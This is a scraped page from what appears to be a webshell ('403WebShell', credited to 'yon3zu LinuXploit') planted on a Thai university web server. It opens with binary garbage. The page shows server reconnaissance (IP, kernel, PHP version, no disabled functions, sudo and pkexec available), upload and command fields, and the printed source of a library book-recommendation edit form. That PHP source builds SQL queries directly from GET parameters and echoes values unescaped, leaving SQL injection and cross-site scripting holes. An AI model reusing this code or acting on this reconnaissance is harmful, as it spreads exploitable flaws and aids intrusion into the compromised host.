h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/arit/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/arit/IntroForm_Edit.php
<?php session_start();	 	
include "IntroForm_Check.php";?>
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">

<link rel="shortcut icon" href="images/logotab.ico">
</head>

 <!-- เลือกวันที่-->
<link type="text/css" href="calendar2/flora.calendars.picker.css" rel="stylesheet"/>
<script type="text/javascript" src="js/jquery.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.plus.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.picker.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.thai.min.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.thai-th.js"></script>
<script type="text/javascript" src="calendar2/jquery.calendars.picker-th.js"></script>
<script type="text/javascript">
$(function() {
    $('#mydate').calendarsPicker({calendar: $.calendars.instance('thai','th')});
});
</script>
        <link href="structer.css" rel="stylesheet" type="text/css">



 <!-- คณะและสาขาวิชา่-->
<script language="javascript">
menu = new Array();
menu[-1] = new Array(0, "ไม่มีข้อมูล");
menu[1] = new Array( 101, "การศึกษาปฐมวัย", 102, "สังคมศาตร์", 103, "ภาษาไทย",104,"ภาษาอังกฤษ",105,"คณิตศาสตร์",106,"วิทยาศาสตร์ทั่วไป");
menu[2] = new Array(201, "พัฒนาชุมชน", 202, "ภาษาอังกฤษ",203,"รัฐประศาสนศาสตร์",204,"ภาษาไทย",205,"การจัดการทางวัฒนธรรม",206,"สังคมศาสตร์เพื่อมัคคุเทศก์");
menu[3] = new Array(301, "อุตสาหกรรมท่องเที่ยว", 302, "บริหารทรัพยากรมนุษย์",303,"การจัดการ",304,"การตลาด",305,"คอมพิวเตอร์ธุรกิจ",306,"เศรษฐศาสตร์ ",307,"นิเทศศาสตร์ ");
menu[4] = new Array(401, "การเพาะเลี้ยงสัตว์น้ำ", 402, "เกษตรศาสตร์",403,"วิทยาศาสตร์และเทคโนโลยีการอาหาร");//ถ้าเพิ่ม สาขาก็เพิ่มmenu[4]
menu[5] = new Array(501, "วิศวกรรมการจัดการ", 502, "เทคโนโลยีอุตสาหกรรม (ต่อเนื่อง)");
menu[6] = new Array(601, "การแพทย์แผนไทยประยุกต์", 602, "สาธารณสุขศาสตร์",603,"ฟิสิกส์",604,"เคมี",605,"ชีววิทยา",606,"เทคโนโลยียางและพอลิเมอร์",607,"เทคโนโลยีสารสนเทศ",608,"วิทยาการคอมพิวเตอร์",609,"วิทยาศาสตร์สิ่งแวดล้อม",610,"คหกรรมศาสตร์",611,"ชีววิทยาประยุกต์",612,"คณิตศาสตร์และสถิติ");
menu[7] = new Array(701, "ออกแบบประยุกต์ศิลป์", 702, "นาฏยรังสรรค์",703,"ดนตรีสากล",704,"ดนตรีไทย",705,"ทัศนศิลป์");
menu[8] = new Array(801, "หลักสูตรและการสอน", 802, "การบริหารการศึกษา",803,"ยุทธศาสตร์การพัฒนา",804,"วิทยาศาสตร์ศึกษา",805,"สาธารณสุขชุมชน",806,"การจัดการเทคโนโลยีการเกษตร",807,"การบริหารธุรกิจ");


function showSubMenu(i)//อันนี้ไม่ต้องแก้
{
box = document.f1.Branch;
i++;
while(box.options.length) box.options[0] = null;
c = 0;
for(m = 0; m < menu[i-1].length/2; m++) {
if((document.f1.action.value == "post") && (menu[i-1][m*2] >= 0)) {
box.options[c++] = new Option(menu[i-1][m*2+1], menu[i-1][m*2]);
}
else {
box.options[c++] = new Option(menu[i-1][m*2+1], menu[i-1][m*2]);
}
}
}
</script>		
		

<script language="JavaScript"> // ตรวจสอบข้อมูลก่อนเพิ่ม
function checkFields2() {
missinginfo = "";
if (document.f1.Title.value == "") { 
missinginfo += "\n - * สังกัด/คณะ";
}
if (document.f1.Fname.value == "") { 
missinginfo += "\n - * ชื่อ";
}
if (document.f1.Lname.value == "") { 
missinginfo += "\n - * สกุล";
}

if (missinginfo != "") {
missinginfo ="_____________________________\n" +
"กรุณากรอกข้อมูลต่อไปนี้ :\n" +
missinginfo + "\n_____________________________" +
"\nกรุณากลับไปกรอกอีกครั้ง ";
alert(missinginfo);
return false;
}
else return true;
}
</script>

<title>แบบฟอร์มแนะนำทรัพยากรเข้าห้องสมุด</title>

</head>
<style type="text/css">
.news_content
{
	width:750px;
	float:right;
}

.news_menu
{
	width:200px;
	float:left;
	height:800px;
}

.sidebar_menu {
	list-style: none;
	margin: 0 0 30px;
	padding: 0;
}
.sidebar_menu li {
	margin: 0;
	padding: 2px 0 3px 16px;
	background: url(./images/templatemo_list_01.png) no-repeat scroll 0 8px;
	border-bottom: 1px dotted #ccc
}

.sidebar_menu li a {
	font-size: 14px;
}

#sidebar h3 {
	font-size: 16px;
	padding: 0 0 15px 0;
	margin: 0 0 15px 0;
	background: url(./images/sidebar_header_bg.png)  left bottom no-repeat
}


h1 {
	margin: 0 0 5px 0;
	padding: 10px 0 10px 10px;
	font-size: 24px;
	font-weight: normal;
	color: #ffffff;
	background: #26405b;
}

h2 {
	margin: 0 0 10px 0;
	padding: 5px 0 5px 10px;
	font-size: 16px;
}


h4 {
	margin: 0;
	padding: 3px 0 3px 10px;
	font-size: 18px;
	font-weight: bold;
	color: #03F;
	background: #EEE;
}


 .section_02_box {
	 
	float: left;
	width: 350px;
	border: 1px solid #CCCCCC;
	margin: 0 20px 0 0px;
}

.section_02_box .section_02_box_content{
	float: left;
	padding: 15px;
}

.section_02_box_content .section_02_box_content_title {
	font-weight: bold;
}

.section_02_box_content ul{
	clear: both;
	list-style: none;
	margin: 0;
	padding: 0;
}

.section_02_box_content ul li{
	padding: 0 0 5px 15px;
	margin: 0;	
	background: url(images/templatemo_listicon.gif) top left no-repeat;
}

.section_02_box img {
	float: left;
	margin: 3px 15px 0 0;
}
.cleaner_with_height {
	clear: both;
	width: 100%;
	height: 20px;
}

.style1 {color: #0000FF}
</style>



</head>


  <body>
	<!--start logo -->
	<div id="logo">
           		 <?php include "logo.php";?>
    </div>
    <!--end logo -->


  
	<!-- start nav -->
	<nav>
    	<div id="nav">
        	<div id="content-nav">
           		 <?php include "navigator.php";?>
            </div>
        </div>
       
    </nav>

    
    
	<!-- start article -->
    <article>
    
    	<div id="content"> 	<!-- start content -->
        
        	<div class="content-title">
            แบบฟอร์มแนะนำทรัพยากรเข้าห้องสมุด <img src="images/dot21.jpg" width="12px;"> 
              <div class="content-line"></div>
          </div>

			<div class="content-text">
                
                
	
                
                            	 <div class="news_menu">
            
        
                    <ul class="sidebar_menu">
                        <li><a href="IntroForm_Admin2.php">ค้นหาข้อมูล</a></li>				
        <?php include('IntroForm_Authen.php');
									if(empty($numrows))
									{
		?>
                      			  <li><a href="IntroForm_login.php">เข้าระบบ</a></li>
                        
        <?php }
									else
									{
										
										
										
		?>							
		
                       			 <li><a href="IntroForm_Admin.php">แบบฟอร์มออกร้านหนังสือ</a></li>				
						<li><a href="IntroForm_Publisher.php">ข้อมูลสำนักพิมพ์</a></li>				

								 
									  <li><a href="IntroForm_logout.php">ออกจากระบบ</a></li>
        <?php }
						
		?>
                        
                        
                        
                        
                    </ul>
           
           		</div>	
                
                
                
              <div class="news_content">
				
  
  
  
  <?php if (isset($_GET[Edit]))

{
 include "connect_intro_resource.php";
$Edit=$_GET[Edit];
$page=$_GET[page];
$keyword=$_GET[keyword];
$OrderType=$_GET[OrderType];
$query=mysql_query("select * from introdetail where IntroID='$Edit'");
$arr=mysql_fetch_array($query);
$IntroID=$arr[IntroID];
$Fname=$arr[Fname];
$Lname=$arr[Lname];
$Title =$arr[Title];
$Author  =$arr[Author];
$Publisher =$arr[Publisher];
$PulbilshYear =$arr[PulbilshYear];
$Edition =$arr[Edition];
$NumWant =$arr[NumWant];
$Price =$arr[Price];
$SourceStatus =$arr[SourceStatus];
$CallNumber =$arr[CallNumber];
$SourceType =$arr[SourceType];
$ISBN =$arr[ISBN];

?>

  <form action="IntroForm_EditSubmit.php" method="post" name="f1" onSubmit="return checkFields2();">
  <h2> แก้ไขข้อมูลผู้แนะนำทรัพยากร </h2> 
  
		  <p style="margin-left:20px;">	<span class="style1">คำนำหน้า
		  <select name="pre" id="pre">
		  <?php $query=mysql_query("select * from user where Fname = '$Fname' and Lname='$Lname'");
			$arr=mysql_fetch_array($query);
			$Pre=$arr[Pre];
			$Depart=$arr[Depart];
			$MailUser=$arr[MailUser];
			$Tel=$arr[Tel];
		  	
			$pre1 = array(
    					"--กรุณาเลือก--" => "",
    					"นางสาว" => "นางสาว",
						"นาง" => "นาง",
    					"นาย" => "นาย",
						"ศ." => "ศ.",
    					"รศ."=> "รศ.",
						"ผศ." => "ผศ.",
						);
		foreach ($pre1 as  $ID => $value)
						{
						
							if ($Pre==$value)
							{
							echo " <option value='$value' selected >$ID</option>";
							}
							else
							{
							echo " <option value='$value'>$ID</option>";
							}
						}
		  ?>
	      </select>
		  **ชื่อ</span>            
		    <input name="Fname" id="Fname" type="text" value="<?php echo "$Fname"; ?>"/>
		    <span class="style1">            **สกุล</span>            
		    <input name="Lname" id="Lname" type="text" value="<?php echo "$Lname"; ?>"/>
</p>

		  <p style="margin-left:20px;">	
		  <span class="style1">สังกัด</span>            
		    <input name="Depart" id="Depart" type="text" value="<?php echo "$Depart"; ?>"/>
		    <span class="style1">            อีเมล</span>            
		    <input name="MailUser" id="MailUser" type="text" value="<?php echo "$MailUser"; ?>"/>
		    <span class="style1">            เบอร์โทร</span>            
		    <input name="Tel" id="Tel" type="text" value="<?php echo "$Tel"; ?>"/>
</p>




  <h2> แก้ไขข้อมูลทรัพยากร </h2> 
  
		  <p style="margin-left:20px;"> <span class="style1">	ประเภททรัพยากร</span>
		    <select name="SourceType" id="SourceType">
              <?php $query2=mysql_query("select * from sourcetype ");
			$row2=mysql_num_rows($query2);
			for ($j=1;$j<=$row2;$j++)
			{
			$arr2=mysql_fetch_array($query2);
			$SourceTypeID=$arr2[SourceTypeID];
			$SourceTypeName=$arr2[SourceTypeName];
			$color=$arr2[color];
				if ($SourceType==$SourceTypeID)
				{
				echo " <option value='$SourceTypeID' selected >$SourceTypeName</option>";
				}
				else
				{
				echo " <option value='$SourceTypeID'>$SourceTypeName</option>";
				}
			}
			
			
			
		  ?>
            </select>		
			
	    <span class="style1">**ชื่อเรื่อง            
		    <input name="Title" type="text" id="Title" value="<?php echo "$Title"; ?>" size="60px;"/> 
            <input name="IntroID" type="hidden" id="IntroID" value="<?php echo "$IntroID"; ?>">		   
            <input name="page" type="hidden" id="page" value="<?php echo "$page"; ?>">		   
            <input name="keyword" type="hidden" id="keyword" value="<?php echo "$keyword"; ?>">		   
            <input name="OrderType" type="hidden" id="OrderType" value="<?php echo "$OrderType"; ?>">		   
	    <p style="margin-left:20px;">	
		    <span class="style1">      ชื่อผู้แต่ง</span>            
		    <input name="Author" id="Author" type="text" size="36px;" value="<?php echo "$Author"; ?>"/>
		     <span class="style1">สำนักพิมพ์</span>          
		    <input name="Publisher" id="Publisher" type="text" size=36px;&quot; value="<?php echo "$Publisher"; ?>"/> 
	    </p>
			
			<p style="margin-left:20px;">	 
		    <span class="style1"> 
  		ISBN          
		    <input name="ISBN" id="ISBN" type="text"size="15px;" value="<?php echo "$ISBN"; ?>"/>			
			
เลขเรียก            
		    <input name="CallNumber" id="CallNumber" type="text"size="25px;" value="<?php echo "$CallNumber"; ?>"/>						  
		    ปีที่พิมพ์            
		    <input name="Year" id="Year" type="text"size="5px;" value="<?php echo "$PulbilshYear"; ?>"/></span>  
		    <span class="style1">   ครั้งที่พิมพ์ </span>            
		    <input name="Edition" id="Edition" type="text" size="10px;" value="<?php echo "$Edition"; ?>"/>
</p>
			<p style="margin-left:20px;">	 
		  <span class="style1">
		    จำนวนที่ต้องการ           
		    <input name="NumWant" id="NumWant" type="text"size="20px;" value="<?php echo "$NumWant"; ?>"/> 
			ราคา           
		    <input name="Price" id="Price" type="text" size="20px;"  value="<?php echo "$Price"; ?>"/> 
		    (บาท/หน่วย)</p>
			<p style="margin-left:20px;">	 
			
				 <span class="style1">
			สถานะ 
			<select name="SourceStatus" id "SourceStatus">
		  <?php $query2=mysql_query("select * from statustype ");
			$row2=mysql_num_rows($query2);
			for ($j=1;$j<=$row2;$j++)
			{
			$arr2=mysql_fetch_array($query2);
			$StatusTypeName=$arr2[StatusTypeName];
			$StatusTypeID=$arr2[StatusTypeID];
			$color=$arr2[color];
			if ($SourceStatus==$StatusTypeID)
			{
			echo " <option value='$StatusTypeID' selected >$StatusTypeName</option>";
			}
			else
			{
			echo " <option value='$StatusTypeID'>$StatusTypeName</option>";
			}
			}
		  ?>
			</select>
			
			   // ส่งอีเมล์แจ้งสถานะ<input name="sendmail" type="checkbox"  id="sendmail" value="1" checked>
		  </span> 
</p>


		  <p style="margin-left:20px;">
		    <input type="submit"   value="ยืนยันการแก้ไข" /> 
            <input name="" type="reset" value="ยกเลิก" />
</p>
		  </form >         
              

<?php }
  ?>  
  
  
  
               
			  


              </div> <!-- end news_content -->

         </div> <!-- end content-text -->

       
       
       </div>     	<!-- end content -->
  
    </article>




<footer>
<?php include "footer.php";?>
</footer>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit